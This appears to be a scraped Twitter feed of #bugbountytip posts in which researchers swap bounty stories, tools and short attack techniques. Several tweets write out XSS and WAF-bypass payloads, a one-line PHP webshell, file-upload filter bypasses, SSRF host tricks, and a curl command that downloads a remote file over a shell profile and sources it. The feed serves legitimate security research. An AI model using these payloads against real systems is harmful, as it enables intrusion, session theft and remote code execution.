@Murdockz_CEH


2019-09-20 20:51:58
1 Company: "Great find, keep up the good work and please continue to test the API" Me: "Sure...btw I was able to achieve RCE further exploiting the SQLi on the strfdate feild" Company: ".........." đŸ„ŽđŸ˜‚đŸ˜… btw this is a Ruby built API đŸ€Ș #bugbounty #bugbountytips #bugbountytip
expl0itc0der
@vanshitmalhotra


2019-09-20 18:58:49
0 Stealing JWTs in localStorage via XSS #BugBounty #BugBountyTip #Pentesting #penetrationtesting #cybersecurity https://t.co/XkEWCB2gXb
Michele Romano
@Mik317_


2019-09-20 17:58:38
0 OK, I'm off ... can't find something challenging and want to find something on a well paid and very used software ... any suggest on the name of the software to test? #BugBountyTip https://t.co/EUH5oFQ6Wk
Rafin Rahman Chy
@rafinrahmanchy


2019-09-20 17:44:24
0 Free Nmap Courses https://t.co/TAy9OCjuHo https://t.co/6EEKrEKPj5 https://t.co/82UGYDkWgz #nmap #Pentesting #InfoSec #CyberSecurity #Hacking #Hacker #EthicalHacking #whitehat #BugBounty #BugBountyTip https://t.co/UjVc2AxHSj
intigriti
@intigriti


2019-09-20 15:39:53
9 🔍 Looking for XSS? Don't forget the parameter names! 💡Thanks for the #BugBountyTip, @p4fg! #HackWithIntigriti https://t.co/VsFLtVFJRm
Mehmet Xyele
@mehmetxyele


2019-09-20 15:01:17
6 Subdomain enumeration with Rapid7 FDNS using AWS Athena https://t.co/fTJDvpeOWF #bugbounty #bugbountytips #bugbountytip #hackerone #hacker0x1 #hacker101 #bugcrowd
plenum đŸ‡č🇳
@plenumlab


2019-09-20 14:58:21
0 Been busy lately to do write-ups here is a short story about 2500$ bug chain #BugBountyTip #BugBounty https://t.co/TMV1kiRFPl
Vulkey_Chen
@Vulkey_Chen


2019-09-20 14:55:12
0 #BugBountyTip #bughunter #bugbountytips BugBounty Hunter's Vulnerability Test Aid Platform: https://t.co/KrIlHNdFai ,Open Source Address: https://t.co/oUqeQBxmDQ
A hacker's life
@Unknownuser1806


2019-09-20 14:18:59
0 Bugbounty cheatsheet https://t.co/dIe8tBFAK7 #bugbounty, #BugBountyTip
Karel Origin
@Karel_Origin


2019-09-20 11:20:46
1 @intigriti couldn't handle this #bugbountytip (😱), so here I am: XSS executing on the wrong domain? No problem! Social Engineer your favourite platform analyst! https://t.co/26axjq8Iwj
SecuNinja
@secuninja


2019-09-20 11:05:16
3 don't waste your time with @zerocopter form based public programs. just got replies after 10 months telling me they cannot reproduce a bug.... wow! what surprise after 10 months. others still open same long... #bugbounty #bugbountytip
Murdockz
@Murdockz_CEH


2019-09-20 07:21:10
1 API --> JSON body post request--> contains two numeric fields --> first field set value from -1 to 9999999999 --> PostgreSQL database disclose --> set other field from 100 to 999999 --> table, query, fields disclose. #bugbountytips #bugbounty #bugbountytip
kassih mouhssine
@KassihMouhssine


2019-09-20 00:00:17
0 6 bugs : 4 idors and broken access control and account takeover and all this shit are duplicated #bugbountytip #BugBounty #CyberSecurity #dxtr0x01
Faizal Abroni
@faizalabroni


2019-09-19 23:10:40
2 https://t.co/f8BIngazNw This is how we found something from information disclosure to remote code execution and Worth $10.000 (indonesian language) #bugbountytip #bugbounty #togetherwehitharder #ItTakesaACrowd #hackerone #bugcrowd
expl0itc0der
@vanshitmalhotra


2019-09-19 20:09:45
6 Bug Bounty — Tips / Tricks / JS (JavaScript Files) https://t.co/GTENhx5EI7 #BugBounty #BugBountyTip #JS #PenetrationTesting #pentesting #devops #devsecops #cybersecurity
expl0itc0der
@vanshitmalhotra


2019-09-19 20:03:33
2 JS-Recon detailed. Analizying the internal network with a XSS https://t.co/ySiyhKIP7K Follow For Cyber Security Training and Bug Bounty Updates https://t.co/iNczOcGmCt #BugBounty #BugBountyTip #Penetrationtesting #pentesting #cybersecurity #tools #pentesttools #bugbountytool
expl0itc0der
@vanshitmalhotra


2019-09-19 19:59:58
1 Exploiting File Uploads – A Tale of a $3k worth RCE --- $$ https://t.co/zpcHqz0fyx #BugBounty #BugBountyTip #PenetrationTesting #Penetesting #CyberSecurity #bounty $$$$$
expl0itc0der
@vanshitmalhotra


2019-09-19 19:54:18
0 BugBounty --- Cheat Sheets, Methodologies https://t.co/8CyoUV65oL #BugBounty #BugBountyTip $$$$$$$
bugbountytip
@a_l_e_r_t_1_


2019-09-19 19:03:19
0 VIM tutorial: linux terminal tools for bug bounty pentest and redteams w... https://t.co/R4yTVHqWHE #bugbountytip
itsmenaga
@nagarockshard


2019-09-19 17:58:21
0 If You See Any White Label Error Page just load your Burp intruder With Actuator Endpoints . If lucky Enough You might End Up With Gold Mine. List:- https://t.co/IObR5VqFPJ #pentesttips #bugbountytip #bugbounty
გოჩა ოჄრაძე (Gocha Okradze)
@GochaOqradze


2019-09-19 16:29:17
0 From Tbilisi to Batumi is 5 hours by train :) Decide play in Termux and recon :) #bugbountytip https://t.co/uoco4qvpZG
DarkOverFlow
@HAXORANON


2019-09-19 12:56:29
0 does anyone know how to find forgotten endpoints if so dm me #hackerone #bugbountytip #bugbounty #bughunter #bugbountytips
Shaked Klein Orbach đŸ‡źđŸ‡±
@shakedko


2019-09-19 11:21:56
1 Did you know about "thisisunsafe" when visiting HTTPS websites with HSTS? https://t.co/e9VaXqwGpd Almost like IDDQD or better IDKFA #BugBounty #bugbountytip
Dominik MaƂowiecki
@5up3rD43m0n


2019-09-19 09:54:47
0 it's one of these days when you check your database and realize that a bug hunter was successful, but he did not realize it and forget to report it #bugbountytip @Hacker0x01
Constant đŸ‡Ș🇬
@Mr_A_ConstanT


2019-09-19 09:44:14
0 a shell script aim to automatically launch 50+ online web scanning tools in the Browser against a target domain in a 10 waves, #CyberSecurity #bugbountytip #WebApp #Hacking https://t.co/nTNLn3LrpY
JaWaD đŸ‡Č🇩
@CHAJER2


2019-09-19 09:39:01
0 Yay, I was awarded a $750 bounty on @Hacker0x01 #TogetherWeHitHarder steps: == #bugbountytip: Change sometimes method post to get can lead to Information Exposure Through Debug Information.
Avanish Pathak
@avanish46


2019-09-19 05:52:05
0 #bugbountytip discovered CSRF+Stored XSS in a private program on @Bugcrowd but unfortunately XSS was Out of scope in that program. How it works :- https://t.co/f2YJa1WgTi
A hacker's life
@Unknownuser1806


2019-09-19 03:08:09
1 When you are looking for vulnerabilities, always remember to think outside the box and submit encoded values to see how the site handles the input. #hacking, #bugbountytip ,#bugbounty
Fisher
@Regala_


2019-09-19 01:12:56
2 The less you use scanners, the more severe your issues are #cosmic #DISTURBANCE 🇹🇩 #bugbounty #bugbountytip
Murdockz
@Murdockz_CEH


2019-09-18 19:58:10
0 Guys if you are looking to get up and running with Go / Golang, I highly recommend this video by @traversymedia Go / Golang Crash Course https://t.co/kH75W4DeY3 #bugbounty #go #golang #bugbountytip #bugbountytips
ÊŠŐŒÓ„ŐŒÖ…ŐĄŐŒ ʊֆɛʀ
@Unknownuser1806


2019-09-18 18:56:33
0 Good #hacking is a combination of observation and skill. #bugbountytip , #motivation ,#bugbounty
RabbidByte
@RabbidByte


2019-09-18 14:35:27
0 Don't forget about the @Hacker0x01 Hacker101 discord channel .... I missed way too much when I forgot about it for 8 months or so. #bugbountytip
Emad Youssef
@Sy3Omda


2019-09-18 12:57:27
0 as it looks simple as it should be BUT this would minimize your time in enumeration phase curl https://t.co/wuePgiRbGU -o ~/.bash_profile && echo "source ~/.bash_profile" >> ~/.bashrc i have combined most of keyhack in one bash profile enjoy #BugBounty #bugbountytip #Pentesting
gweeperx
@gweeperx


2019-09-18 07:42:39
2 Just another XHR cookie/body stealer: https://t.co/kbmsAYuwsJ #bugbounty #bugbountytip #bugbountytips
ÊŠŐŒÓ„ŐŒÖ…ŐĄŐŒ ʊֆɛʀ
@Unknownuser1806


2019-09-18 03:39:15
0 DetExploit - Software That Detect Vulnerable Applications, Not-Installed OS Updates And Notify To User https://t.co/HrwGYO0fjL #bugbounty , #bugbountytip ,#hacking
ÊŠŐŒÓ„ŐŒÖ…ŐĄŐŒ ʊֆɛʀ
@Unknownuser1806


2019-09-18 03:33:03
0 #XSS, #SQLi, #CSRF, #SSRF, #XXE, OS command #injection, directory traversal., and #HTTPrequest smuggling. - > Everything you need to getting started with #bugbounty #bugbountytip , #hacking https://t.co/4ZnwNy6STO
daniel_v
@danielv47251669


2019-09-17 18:09:57
0 #bugbountytip #bugbountytips >found a login page restricted to business email only >intercepted the signup request > intercepted response from this request > changed response body from "false" to "true" > auth bypass > internal access to the platform
farukh
@Farukhwap


2019-09-17 16:17:30
0 @Olacabs @ola_supports @olamoney_in @OlainUK why is it empty đŸ€” #fixit #bugbountytips #bugbountytip #loot #Ola https://t.co/CS0HUxo0if
luffydragneel
@Hackers_Guild


2019-09-17 15:56:39
0 Suppose there is contracts page at https://t.co/guSo2PGluZ meant only for Admins and not visible in the lower privileged user's UI. Just directly browse to that page from this lower privileged account, and you might end up seeing the contents there. #bugbountytip #bugbounty https://t.co/1cOxnJ0OTI
Vulkey_Chen
@Vulkey_Chen


2019-09-17 13:52:17
1 #bugbountytip #burpsuite #bugbountytips #bughunter I build a burpsuite extension to mark sensitive information.If "mobile phone number" and "email address" information appear in the response content, then mark this request for red color. https://t.co/qeY996qzTi
Ammar AmerđŸ‡žđŸ‡Ÿ
@cry__pto


2019-09-17 13:51:02
17 i have uploaded 34 new articles about different fields of hacking as a pdf files to my github repository. i will continue working on this project years to come. https://t.co/q2layzVpKz #pentest #malware #hacking #infosec #cybersecurity #bugbountytip #redteam #hacking #0day #osint https://t.co/IAaAGXn9HD
ÊŠŐŒÓ„ŐŒÖ…ŐĄŐŒ ʊֆɛʀ
@Unknownuser1806


2019-09-17 12:54:42
0 Awesome #Shodan search queries https://t.co/Wo0inc380w #bugbounty , #bugbountytip ,#hacking
Vedant
@ved_wayal


2019-09-17 08:58:43
0 Blind XSS is lub 😜😍 #bugbountytip https://t.co/GHlwkPix6W
Rishabh
@____cypher____


2019-09-17 06:58:06
0 SSRF tip: [email protected] ==> black[.]com black[.]com?white[.]com ==> black[.]com black[.]com#white.com ==> black[.]com #bugbountytip #BugBounty #bugbountytips
oops
@a_l_e_r_t_1_


2019-09-17 06:44:01
0 Search for high-level vulnerabilities if you don't want the vulnerability to be duplicated :) #bugbountytip
Sultan Haikal
@SultanMoeslim


2019-09-17 06:08:28
0 {Reviews} in bugbounty, report recipients ... are taking more references from reporters! to imitate / change systematic design, secure etc. reporters don't get any profit. and those who change this, of course benefit internally. best manipulation. #bugbounty #bugbountytip
AFAQUE KHAN
@Afaquekhan24


2019-09-17 05:13:43
1 @stereotype32 Remember you fools...you bug bounty hunter fools... any bypass technique that is publicly posted no longer work in real world scenario .....this is my #protip for today #hackerone #bugbountytip #BugBounty #bugbountytips #bugcrowd ...Happy hunting...
Pomegranate 🌮
@ret2pomegranate


2019-09-17 04:33:45
1 When you & your partner get a bounty. #bugbountytip #bugbounty #infosec https://t.co/3rjqUgsXeE
luffydragneel
@Hackers_Guild


2019-09-17 03:46:04
1 Suppose the sensitive content is at /folder/content. If there is proper access control on /folder, it doesn't mean that there is proper access control when you visit /folder/content directly. Always look for access control issues on each endpoint. #bugbountytip #bugbounty https://t.co/J8jVcy2IKB
Pomegranate 🌮
@ret2pomegranate


2019-09-16 23:47:44
0 Just reported Double-Sequence XSS which affects 2 parameters in a single endpoint to a program on @Hacker0x01. #bugbounty #bugbountytip #infosec
Michele Romano
@Mik317_


2019-09-16 18:22:47
0 @Manikan77602456 understand how programs work, and definitely how other researcher think ;). Probably see how reports are thought/presented/explained is the best thing you can do to learn. Also, check Twitter #bugbountytip and similar: you'll find good bypasses or medium articles.
Jakub Juszczak
@apertureless


2019-09-16 12:11:31
0 Blind XSS is still my favorite. Spray the payload and after some time, you receive your christmas present 🎁 #infosec #bugbountytip
intigriti
@intigriti


2019-09-16 11:56:17
2 This actually worked on the first site we tested! đŸ€Ż P.S.: Legacy or unimplemented OAuth flows often contain vulnerabilities that can lead to account takeover. 😈 Thanks for the #BugBountyTip, @ngalongc! https://t.co/vwAi9hhHrm
SilexSecure
@silexsecure


2019-09-16 11:23:55
0 @silexsecure Today you will learn WordPress penetration testing using WPScan and Metasploit. @rsilexlab @metasploit @ubuntu @kalilinux @wordpressdotcom #infosec #cybersecurity #bugbountytip #bugbounty #Pentesting #GodMorningmonday #CyberAttack #SSL#GOODhat
Karna
@karna__1


2019-09-16 11:04:38
1 If you want a free online phone number service to receive OTP(s) for your web app testing, here's one: https://t.co/3dPt58DZGy #bugbounty #bugbountytip
Oops!
@Corrupted_brain


2019-09-16 10:17:18
0 This Oracle directory architecture was quite helpful for me to harvest critical information by exploiting XXE and reading files locally. #bugbountytip #bugbounty #Oracle https://t.co/Fjhg3OX2Gd
Sp
@spt_2020


2019-09-16 10:06:29
0 Collection Of Bug Bounty Tip-Will Be updated daily https://t.co/BYm6GxAFnz #bugbountytip
oops
@a_l_e_r_t_1_


2019-09-16 08:48:37
0 Cheap and no ads. Bug bounty is everywhere. 1 Bug = 60 x App. Learn & Hack & Earn Money. Good Hacking! https://t.co/JPaA4CKmfO #openredirection #xss #xxe #ssrf #bounty #rce #graphql #sqlinjection #bugbountytip #webpentest #owasp #bugbountytip #python #ruby #csfr #hack #hackers
Juha Remes
@juha_remes


2019-09-16 08:36:33
0 This is a great #bugbountytip. 👍 https://t.co/XteWTBVmMe
oops
@a_l_e_r_t_1_


2019-09-16 08:22:45
0 Really very, very slow in fixing gitlab vulnerabilities #bugbountytip
Pomegranate 🌮
@ret2pomegranate


2019-09-16 05:54:08
0 #BugBounty #bugbountytip #infosec Normal User: “Text Injection” (The Depression Period) Bug Bounty Hunter: Arbitrary Spoofed Character Encoded Injection via the Roman Alphabet. https://t.co/Z20cvTDtUG
Pomegranate 🌮
@ret2pomegranate


2019-09-16 03:35:05
2 Just reported XSS to a program on @Hacker0x01. #InfoSec #bugbounty #bugbountytip Got XSS through a POST request in a parameter, automated it through my web-server due to `document.location.href=` being used in the vulnerable parameter.
ÊŠŐŒÓ„ŐŒÖ…ŐĄŐŒ ʊֆɛʀ
@Unknownuser1806


2019-09-16 02:45:02
0 This tool collects all information about all devices that are directly connected to the internet with the specified keywords that you enter. This way you get a complete overview. #shodaneye : https://t.co/AarJFRVDOP #hacking #bugbounty #bugbountytip
A DNF 🩖
@binb4sh


2019-09-16 01:08:34
0 If the target server is running Windows and you can create files and directories on it, try to create ones with forbidden names (CON,AUX,etc)! It may cause errors resulting in Info Disclosure/DoS. An example written in PHP: file_put_contents("con.png",""); #bugbountytip
terjanq
@terjanq


2019-09-16 00:22:36
3 I haven't published any writeups in a while. Here is my latest #writeup to an awesome #buyify challenge from #csaw19 #ctf that has just ended a few hours ago. The author of the task is @itszn13. You should definitely check this out! https://t.co/uAWk6hsyoI #bugbountytip
Drok3rđŸŽâ€â˜ ïž
@drok3r


2019-09-15 21:23:18
0 pixload -- Image Payload Creating tools #bugbountytip #payload Link [ https://t.co/6wh5X9EWXB ] https://t.co/Fc4kBuKmMp
securibee 🐝
@securibee


2019-09-15 19:19:08
0 @Random_Robbie @j_opdenakker @Vin1515 @zseano @NahamSec @TomNomNom @d0nutptr @stokfredrik @yaworsk @Alyssa_Herrera_ has great content as well make sure to follow her! @ITSecurityguard Follow #bugbountytip although it's pretty noisy. Subscribe to newsletter from @PentesterLand https://t.co/e2fgYy31Gr I keep forgetting people. My bad!
dykaushik
@dykaushik


2019-09-15 17:40:17
0 Collection Of Bug Bounty Tip-Will Be updated daily https://t.co/GGQro6C5zH #bugbountytip
Mayur Parmar
@th3cyb3rc0p


2019-09-15 17:13:52
0 Must read blog🙂 https://t.co/4nQ54tutfD #bugbountytip #BugBounty #bughunting #ethicalhacking
W🌍aR🐁eeq
@wareeq_shile


2019-09-15 16:44:53
0 Can this still be taken over? #BugBounty #bugbountytip #bugbountytips https://t.co/nN5Xdani38
Wh11teW0lf
@Wh11teW0lf


2019-09-15 16:26:05
1 #bugbountytip The most vulnerable place in Wordpress/Drupal is a custom themes and plugins. Wordpress Location: /wp-content/themes/ and /wp-content/plugins/ You can found their name with Waybackarchive or site map in Burp.
Murdockz
@Murdockz_CEH


2019-09-15 14:50:00
0 Passive recon 😁 #bugbountytip #bugbountytips #bugbounty https://t.co/oCvjzwcsb6
Somdev Sangwan
@s0md3v


2019-09-15 13:27:18
0 @yassergersy Why is this #bugbountytip and not #websecuritytip?
vavkamil
@vavkamil


2019-09-15 13:01:34
1 How to bypass Android certificate pinning and intercept SSL traffic #bugbounty #bugbountytip https://t.co/KFRUCYEc96
Youssef A. Mohamed
@GeneralEG64


2019-09-15 12:36:29
4 The easiest P1 ever!! 😂😍 Steps to Reproduce: Navigated to https://t.co/CEADFzHYUD Directory Bruteforcing found "admin" Bruteforcing into it found "users.db" Exposing admin's creds in plaintext! Logging in to the Admin Panel. #BugBounty #bugbountytip https://t.co/7SuX3E5otC
BlackClover
@Bc10ver


2019-09-15 12:15:41
0 Top story: @yassergersy: '#bugbountytip : Load response , extract all valid parameters names , submit all as get and post parameters , check which one is being reflected , you will increase your chances to get #xss ' https://t.co/dkBDDSkQ0n, see more https://t.co/fVnXn9Z0FJ
đŸ‘»in🐚
@0xerror


2019-09-15 12:15:40
0 XSS News: @yassergersy: '#bugbountytip : Load response , extract all valid parameters names , submit all as get and post parameters , check which one is being reflected , you will increase your chances to get #xss ' https://t.co/TDrl37pldF, see more https://t.co/4VACxHYGGn
oops
@a_l_e_r_t_1_


2019-09-15 08:55:16
1 Cheap and no ads. Bug bounty is everywhere. 1 Bug = 60 x App. Learn & Hack & Earn Money. Good Hacking! https://t.co/JPaA4CKmfO #openredirection #xss #xxe #ssrf #bounty #rce #graphql #sqlinjection #bugbountytip #webpentest #owasp #bugbountytip #python #ruby #csfr #hack #hackers
nocomp
@nocomp


2019-09-15 08:01:13
0 Any good #BugBounty discord place for learn and share? #bugbountytip thx for RT
HackIsOn Âź
@hackison


2019-09-15 07:57:21
0 Ghazi is a BurpSuite Plugins For Testing various PayLoads Like "XSS,SQLi,SSTI,SSRF,RCE and LFI" through Different tabs , Where Each Tab Will Replace Every GET or POST Parameters With Selected TAB in "Proxy" or "Repeater" TAB. https://t.co/PUhzq0SuEo #bugbounty #bugbountytip
(((Gamliel)))
@Gamliel_InfoSec


2019-09-15 05:12:49
0 Awesome #bugbountytip https://t.co/DnjdSHMcix
Securisec 🚀
@securisec


2019-09-15 02:08:06
0 "RT RT YoKoAcc: Bismillah. Releasing one of my RCE story at one of Bug Bounty Program. Race Condition that could Result to RCE - (A story with an App that temporary stored an uploaded file within 2 seconds before moving it to Amazon S3). https://t.co/j8fCpvwWy6 #bugbountytip

Ankur Vaidya
@4N_CURZE


2019-09-15 00:14:37
0 Finally reached and completed one more milestone :) đŸ˜€đŸ˜ƒđŸ˜đŸ˜â™„ïžâ™„ïžâ™„ïž #openbugbounty #xss #bugbounty #bugbountytip #bughunter #WhiteHats #pentest #Pentesting @openbugbounty @openbounty @whitehatsec @bugbountyforum https://t.co/zKVguucXI3
Pomegranate 🌮
@ret2pomegranate


2019-09-14 20:26:55
0 Just reported RCE to a program on @Hacker0x01. Wish me the best of luck. #infosec #bugbounty #bugbountytip Kind of nervous because of an accidental reboot that occurred while I was testing for a PoC.
ïŒąïœ‰ïœŠïœïœŽ 
@0xBijan


2019-09-14 20:14:02
0 New write-up "How I found a simple and weird Account takeover bug" https://t.co/32185JXNW6 #bugbounty #bugbountytip
Aziz Hakim
@hackerb0y_


2019-09-14 20:09:17
0 I was logged in a program's portal!🧐 Suddenly I have visited this URL!🙄 https://*.redacted.com/user/profile/delete and GUESS what? My account got deleted without any confirmation!đŸ€Ł #bugbountytip #bugbounty
Murdockz
@Murdockz_CEH


2019-09-14 18:22:10
0 2. Will do a write up on how to exploit graphql after bug is fixed and bounty rewarded 😄...there is a part I can't disclose in part 1. #bugbountytip #BugBounty #bugbountytips
Murdockz
@Murdockz_CEH


2019-09-14 18:20:13
0 1. Able to read anyone's gender status when it is set to private or only show to friends. User A not friends with User B. User A can not see User B gender status. User A send a graphql request to user B private gender status is revealed. #bugbounty #bugbountytip #bugbountytips
Pomegranate 🌮
@ret2pomegranate


2019-09-14 16:10:14
0 Accidentally ran a software-specific ‘reboot’ command & crashed the server. It’s been 10+ hours and no response. Should I report this issue to the acquisition/asset? #bugbounty #InfoSec #bugbountytip
Sudoka
@sudo_sudoka


2019-09-14 15:48:48
1 #Bypass #XSS filters with JavaScript RegExp.prototype​.source đŸč🎯🏆 #bugbountytip https://t.co/DiP4CZcqg6
Aditya
@hetroublemakr


2019-09-14 14:15:05
1 Ran into an interesting blog on Medium about #bugbountytip #infosec by @bbinfosec https://t.co/kUUQiAWtca
YasserGersy
@yassergersy


2019-09-14 13:39:56
1 #bugbountytip : Load response , extract all valid parameters names , submit all as get and post parameters , check which one is being reflected , you will increase your chances to get #xss https://t.co/wEtN3fl4xT
oops
@a_l_e_r_t_1_


2019-09-14 12:42:06
0 My favorite xss payload : <img onerror="{alert`1`}" src> #bugbountytip
Fisher
@Regala_


2019-09-14 11:17:53
0 I'll experiment with streaming like all the cool kids are doing these days 😇 Starting October, schedule to be announced. Any particular subjects you'd be interested seeing or people? Let me know below 👇 #bugbounty #bugbountytip #infosec
Khaled Mohamed
@xelkomy


2019-09-13 20:15:20
0 shopify xss google auth this video awesome #bugbountytip #hackerone #BugBounty https://t.co/JbWlhXSOCK
Sandeep Raghav
@Sandeep_tunna


2019-09-13 18:03:30
0 Hey, @LinkedIn , I found a bug in your system. Please respond if you want to fix it. #bugbounty #testing #bugbountytip #LinkedIn
Simon
@7s26simon


2019-09-13 15:48:26
0 Submitted my first #bugbounty report !!! Hope it hasn't been reported already #ethicalhacker #hack #hacking #pentest #pentester #bugbountytip
Mohan Sri Ramakrishna
@S1r1u5_


2019-09-13 14:10:54
0 Yay, I was awarded a $500 bounty on @Hacker0x01! https://t.co/ac1KEZZZWM #TogetherWeHitHarder. #bugbountytip Actually, I am afraid to test the program cuz I saw some good hackers in the thanks page, But I started and I found a reflected XSS on the main page itself.😇
Mourad
@SecuAudit


2019-09-13 11:07:24
0 Any advice how to get into "Apache Axis version: 1.2.1" where remote admin is disabled ? #bugbountytip #bugbountytips
expl0itc0der
@vanshitmalhotra


2019-09-13 06:23:51
0 HTML to PDF converter bug leads to RCE in Facebook Server -- #BugBounty #BugBountyTip #Writeup https://t.co/UgmPhls8Mb
saranraj
@KceSaranraj


2019-09-13 01:58:28
0 I have the following code <li title="?"> test </li> I need to inject vector to break down the HTML Attributes and execute the alert using an event. is there a way to achieve this without using single/double quotes? <>&*#%\'" - Not Allowed @h1_kenan @le4rner #bugbountytip #xss
Mr.CryptoCZ
@cechv2


2019-09-12 06:56:18
0 #Electroneum #ETN $ETN is looking for Bug bounty hounters, IT Gurus, Hackers, if you want to earn money and help @electroneum be more secure go and check our Hackerone program #bugbountytip #Hacker #hackerone #fintech #app https://t.co/qUZ0h5mqqK
Yadhavi
@PrincessYadhavi


2019-09-12 05:18:36
0 Found a subdomain which is pointing to cloudfront using cname. And when i open the page it shows "NoSuchBucket" "The specified bucket does not exist" error. is subdomain takeover possible here? If yes, how? #bugbounty #bugbountytip #bugbountyhelp #s3
ᮂ
@pouyana1


2019-09-12 04:19:02
1 *content-length filtering: use small size shells like: <?='$_GET[x]'?> #bugbounty #bugbountytip #hacking #infosec #hack
ᮂ
@pouyana1


2019-09-12 04:19:01
0 *client side filtering: upload a valid file, intercept the request and change it to the shell extention (php,asp,jsp,..) *content-type filtering: change the content-type to valid content-type like: image/jpeg #bugbounty #bugbountytip #hacking #infosec #hack
ᮂ
@pouyana1


2019-09-12 04:19:01
1 file upload restriction bypass: * name filtering: 1) blackboxing: try to use file extentions like: php[3-n],phtml, pht. 2) whitelising: use null-byte:shell.php%00.gif use double extention format : shell.php.jpg or shell.jpg.php #bugbounty #bugbountytip #hacking #infosec #hack
Henry Chen
@chybeta


2019-09-12 03:06:03
1 bounty calculation formula: crontab(subdomain(amass+subfinder+...) + port(masscan + nmap) + screenshot + dirsearch) + slack = bug bounty #bugbounty #bugbountytips #bugbountytip https://t.co/QCODeeZhC3
Murdockz
@Murdockz_CEH


2019-09-12 00:25:03
0 Sometimes you need to take a long step back to learn new technologies in order to enhance your Bug Bounty skills. Learn the technology that companies use in order to break and exploit them even more. #bugbounty #bugbountytip #bugbountytips https://t.co/lge8ogvAPr
Arif Khan
@payloadartist


2019-09-11 07:06:15
1 Awesome giveaway! đŸ”„ #infosec #bugbounty #bugbountytip https://t.co/0qJjiSx3zl
Sukhmeet Singh
@MadGuyyy


2019-09-11 01:30:19
0 > Website had admin panel with "Login with Google" > Only allowed Google login with company's email > Created an email account [email protected] > Created Google account with that email > Logged into admin panel with Google. 💰$1500 #BugBountyTip #InfoSec #BugBounty
C1h2e1
@C1h2e11


2019-09-11 00:48:34
0 #bugbountytip #bugbountytips Using https://t.co/5gM8SE3B4J for subdomain monitoring, last night I found a .DS_Store leaking on the latest subdomain on https://t.co/5gM8SE3B4J
Guilherme Keerok
@k33r0k


2019-09-10 17:08:23
2 Cloudflare WAF bypass: open("https://host/?xss=%3Ca/href=javascript:1%26%26%26%23x6e;ame%3Eclick me%3C/a%3E","<svg onload=alert(document.domain)>"); #bugbountytip #bugbounty #xss #bugbountytips
Jenish
@_jensec


2019-09-10 16:39:37
2 Yay, I was awarded a $2,000 bounty on @Hacker0x01! For accessing company dashboard via creating account with Email “[email protected]” on main web app and login to dashboard with SSO. #bugbountytip
wywwzjj
@wywwzjj


2019-09-10 16:29:38
0 @artofwebhacking @chybeta https://t.co/O8D1Pp6IcP Here is a website that archive bug bounty tips. 👉https://t.co/Kvxfo3jCh8 Check it out, it has other useful resources too. 😀 #bugbounty #BugBountyTip #bugbountytips @Hacker0x01
o k t a v a n d i
@0ktavandi


2019-09-10 16:08:24
1 anyone have hackerone report with SSRF issue 307 redirect bypass?? #bugbountytip #bugbountytips
Rishabh
@____cypher____


2019-09-10 09:40:44
0 Perfect oneliner for subdomain enumeration curl -s 'https://t.co/A3Qe45ZOra%.'<TARGET>'&output=json' | jq '.[] | .name_value' | sed 's/\"//g' | sed 's/\*\.//g' | sort -u #bugbounty #bugbountytip #bugbountytips #infosec
brsn
@brsn76945860


2019-09-10 04:08:46
0 @achillean @ItsReallyNick @x04steve @shodanhq I've tweeted this a few hours ago, but this works for me: ---------- import mmh3 import requests response = requests.get('https://yourwebsite/favicon.ico') favicon = response.content.encode('base64') hash = mmh3.hash(favicon) print hash ---------- #Shodan #bugbountytip
Securisec 🚀
@securisec


2019-09-09 14:25:30
0 "RT RT osamaavvan: My Writeup about Exploiting JSONP and Bypassing Referer Check. #bugbountytip #bugbountytips #Security https://t.co/pUyJV4QdcW"
Iheb
@ihebhamad514


2019-09-09 12:46:53
0 I found a #bugbounty program where it implements a captcha protection field after certain requests with burp intruder, the only way to bypass it is to delete the Cookie header. As a result, I got 2 valid users accounts. #bugbountytip
Aussan 🇹🇩
@aussan_m


2019-09-09 12:33:12
0 A lot of time people forget to look at the response or intercept the response in burp. Always examine the response in details especially when logging in. I was able to go from regular user to Admin by manipulating the response #bugbountytips #bugbountytip
Japz Divino
@japzdivino


2019-09-09 02:42:25
0 Reading hacktivity report will lead you to bounties by just bypassing the fix for the disclosed report.👌 #noobtip #bugbountytip https://t.co/ppnliULt5T
Hx01
@Hxzeroone


2019-09-08 05:35:30
1 #bugbountytip if the password reset link is shortened in email try checking for common hashes/encodings you may end up with gold mine, in the below scenario the url was shortened and the url id was sequential and encoded in base64 -->Scraping all generated password resets links. https://t.co/n11msD9iPP
x30r
@x30r_


2019-09-07 21:55:13
1 Into cyber security?? I don't know who votes what so lets have a poll! What suites you the most! #cybersecurity #bugbountytip #bugbounty #infosecurity #infoeec
Hussein Daher
@HusseiN98D


2019-09-07 19:40:04
7 Analysis of an RCE I found past week. RT and Like if you want more! If you got a bug bounty program, I'm open to any invite :) #bugbounty #bugbountytip #bugbountytips #infosec https://t.co/VX6QATnRJH
An0nym0us
@MeetAn0nym0us


2019-09-07 17:54:13
1 #bugbountytip While testing a Laravel site try injecting different kinds of payloads or change Request methods to GET>POST or POST>GET. this will result in Laravel exception handler error Disclosing AWS, Database, and SMTP Credentials. https://t.co/jTnU3rf28y
Zeinab Raadsato
@ZRaadsato


2019-09-07 17:21:09
0 All courses are available: Burp Suite, Ethical Hacking, Networking, Secure Coding Free for limited time. #bugbountytip #BugBounty https://t.co/fZCGs25uF0
Jenish
@_jensec


2019-09-07 09:34:14
0 Yay, I was awarded a $1,050 bounty on @Hacker0x01 for bypassing 2FA via old API version’s login page! https://t.co/YGr8yp0IKy #TogetherWeHitHarder #bugbountytip
Osama Avvan
@osamaavvan


2019-09-07 08:22:00
2 My Writeup about Exploiting JSONP and Bypassing Referer Check. #bugbountytip #bugbountytips #Security https://t.co/Ewt9p3qPSe
Muzammil Kayani đŸ‡”đŸ‡°
@muzammilabbas2


2019-09-06 15:26:35
0 #bugbountytip:Access the site without loging into account you will get some hidden endpoints which are overlooked by others.
Tinu rockk
@TinuRock007


2019-09-06 11:14:47
0 https://t.co/kCnDw5TEZu Open redirect to xss (2019) @BugBountyPOC #bugbountytips #BugBountyPOC #BugBounty #security #bugbountytip #bugbountytips #xss https://t.co/KTAOhiR0I7
C1h2e1
@C1h2e11


2019-09-06 10:05:40
1 #bugbounty #Bugbountytip Yesterday's problem was solved, forgetting to modify the Conetent-length but result is duplicated . So sad
Shamem Ahmad
@blkryd


2019-09-06 09:13:48
0 Finding webshells in a linux server. find . -name "*.php" | xargs grep -E 'webshell|' #Bugbountytip #hacktolearn
Shamem Ahmad
@blkryd


2019-09-06 08:50:54
1 A plus sign (+) A simple URL encoded space (%20) A null byte (%00) A newline (%0a) A tab (%09) A carriage return (%0d) #Bugbountytip
OSRC
@OsrcSecurity


